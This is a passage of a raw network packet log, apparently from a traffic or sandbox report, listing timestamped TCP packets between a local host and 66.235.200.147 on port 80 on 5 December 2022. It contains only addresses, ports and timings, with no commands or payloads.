Dec 5, 2022 01:32:37.837872028 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837908983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837909937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837932110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837943077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837951899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837960958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837975025 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837975979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837996960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838009119 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838018894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838030100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838040113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838044882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838061094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838066101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838079929 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838084936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838105917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838107109 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838125944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838129997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838146925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838148117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838167906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838170052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838188887 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838190079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838212013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838232994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838243961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838253021 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838264942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838265896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838287115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838291883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838308096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838314056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838329077 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838335037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838349104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838351011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838371992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838377953 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838393927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838395119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838423967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838428020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838440895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838445902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838460922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838468075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838488102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838506937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838510036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838526964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838537931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838547945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838561058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838568926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838577032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838589907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838589907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838610888 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838613033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838630915 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838632107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838653088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838653088 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838668108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838675022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838692904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838694096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838706970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838716030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838737011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838746071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838757038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838759899 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838771105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838778973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838794947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838799953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838818073 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838820934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838833094 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838841915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838855982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838861942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838885069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838892937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838902950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838916063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838937044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838936090 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838949919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838958025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838974953 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838979006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.838990927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.838999987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839015961 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839023113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839044094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839045048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839060068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839065075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839087009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839087963 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839098930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839107990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839128017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839131117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839147091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839148045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839164972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839170933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839190006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839190960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839211941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839216948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839231968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839236021 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839252949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839258909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839273930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839274883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839294910 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839297056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839318991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839318991 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839342117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839343071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839360952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839364052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839385033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839385033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839405060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839406013 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839426041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839431047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839447021 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839447021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839468956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839473963 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839487076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839488983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839510918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839512110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839524984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839531898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839553118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839554071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839572906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839575052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839593887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839596033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839610100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839615107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839627981 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839637041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839653015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839657068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839678049 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839679003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839699984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839700937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839716911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839720964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839740038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839744091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839761019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839766026 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839783907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839787006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839806080 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839808941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839828968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839840889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839854956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839862108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839880943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839883089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839905024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839910984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839922905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839926958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839937925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839947939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839963913 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839967966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.839978933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.839989901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840004921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840010881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840029001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840034962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840049982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840055943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840074062 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840079069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840087891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840101004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840116024 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840121984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840132952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840142965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840157986 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840163946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840183020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840184927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840209961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840214014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840229988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840231895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840250969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840251923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840271950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840272903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840289116 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840293884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840315104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840316057 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840332985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840336084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840357065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840357065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840378046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840379953 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840394020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840399027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840418100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840420008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840440035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840441942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840456009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840462923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840485096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840495110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840504885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840509892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840526104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840528965 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840548038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840549946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840564013 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840569019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840590000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840590954 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840610981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840612888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840631008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840631962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840651989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840655088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840671062 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840672970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840692997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840697050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840712070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840713978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840733051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840734959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840755939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840758085 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840773106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840778112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840797901 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840797901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840814114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840826988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840847015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840867043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840868950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840887070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840898037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840909004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840918064 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840929031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840931892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840948105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840950966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840970993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.840971947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840992928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.840995073 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841012955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841016054 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841027975 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841033936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841053009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841053963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841067076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841077089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841101885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841109037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841123104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841140985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841144085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841165066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841166019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841185093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841191053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841204882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841206074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841227055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841228008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841240883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841248035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841265917 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841268063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841288090 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841289997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841308117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841310024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841326952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841331005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841352940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841362953 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841372967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841373920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841392994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841396093 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841407061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841414928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841429949 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841435909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841453075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841459036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841470957 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841480017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841496944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841500044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841514111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841521978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841538906 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841542959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841553926 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841563940 CET	80	49705	66.235.200.147	192.168.2.3
